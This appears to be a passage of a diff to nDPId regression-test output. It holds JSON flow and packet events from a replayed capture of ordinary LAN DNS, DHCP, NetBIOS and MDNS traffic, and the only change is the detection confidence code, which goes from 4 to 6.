+00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779619914,"flow_last_seen":1588779619914,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779619914,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1588779619916,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1588779619916,"pkt":"KDc3AG3IAICPmq69CABFAABXwqhAAEAR9E7AqAEBwKgBTQA1uBcAQ5UvALiBgAABAAEAAAAAA3d3dxFnb29nbGV0YWdzZXJ2aWNlcwNjb20AAAEAAcAMAAEAAQAAAAAABMCoAZ0="} -00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779619916,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": 
{"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} +00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":390,"source":"telegram.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779619914,"flow_last_seen":1588779619916,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779619916,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":47127,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"www.googletagservices.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":435,"source":"telegram.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1588779617174,"flow_last_seen":1588779621221,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":5232,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1588779621221,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.52","src_port":23174,"dst_port":31480,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00931{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1588779625981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"thread_ts_msec":1588779625981,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/jrEAAEAR6r0AAAAA\/\/\/\/\/wBEAEMBa16\/AQEGAN7JmyKFuQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="} 
-00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00696{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"telegram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779625981,"flow_last_seen":1588779625981,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1588779625981,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1588779626393,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1588779626393,"pkt":"\/\/\/\/\/\/\/\/BJImXJc1CABFAADlSCQAAIARbWnAqAErwKgB\/wCKAIoA0XdaEQLkXsCoASsAigC7AAAgRUVFRkZERUxGRUVQRkFDTkZDRUNERkZFREJEQ0VIQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCA\/AoAREVTS1RPUC1SQjVUMTJHAAoAAxAAAA8BVaoA"} -00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
+00769{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779626393,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1588779626394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABOW9EAAEARmjHAqAFNwKgB\/wCJAIkAOrFARg4BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779626394,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1588779626394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABOiakAAEARbFnAqAFNwKgB\/wCJAIkAOrE9RhEBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1588779626394,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1588779626394,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABONx8AAEARvuPAqAFNwKgB\/wCJAIkAOrE5RhUBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1588779628757,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1588779628757,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA7n3IAAP8RmKDAqAFNwKgBAcJkADUAJ31bFnMBAAABAAAAAAAABGRhdGkEbnRvcANvcmcAAAEAAQ=="} 
-00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":695,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779628757,"flow_last_seen":1588779628757,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1588779628757,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1588779628804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":121,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":121,"pkt_l4_len":87,"thread_ts_msec":1588779628804,"pkt":"KDc3AG3IEBMx8Tl2CABFAABr7g4AAEARCNXAqAEBwKgBTQA1wmQAVwAAFnOBgAABAAIAAAAABGRhdGkEbnRvcANvcmcAAAEAAcAMAAUAAQAAADwAFBFtYWlsLWRpZ2l0YWxvY2VhbsARwCsAAQABAAAAPAAEp2PXpA=="} -00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779628804,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"dati.ntop.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"167.99.215.164"}} +00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":698,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779628804,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": 
{"query":"dati.ntop.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"167.99.215.164"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1588779629044,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1588779629044,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA6m54AAEARW3bAqAFNwKgBARa0ADUAJpvbsPwBAAABAAAAAAAABXBpeGVsAndwA2NvbQAAAQAB"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629044,"flow_last_seen":1588779629044,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1588779629044,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1588779629045,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1588779629045,"pkt":"KDc3AG3IAICPmq69CABFAABKxbFAAEAR8VLAqAEBwKgBTQA1FrQANpjhsPyBgAABAAEAAAAABXBpeGVsAndwA2NvbQAAAQABwAwAAQABAAAAAAAEwKgBnQ=="} -00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779629045,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} +00905{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":708,"source":"telegram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779629044,"flow_last_seen":1588779629045,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1588779629045,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":5812,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"23": {"risk":"Suspicious DNS Traffic","severity":"High","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"pixel.wp.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"192.168.1.157"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1588779629079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1588779629079,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFpC4AAP8Rk9rAqAFNwKgBAdVDADUAMZzqakQBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} -00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00693{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":720,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1588779596464,"flow_last_seen":1588779631710,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":641,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1588779631710,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} 
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779629079,"flow_last_seen":1588779629079,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1588779629079,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 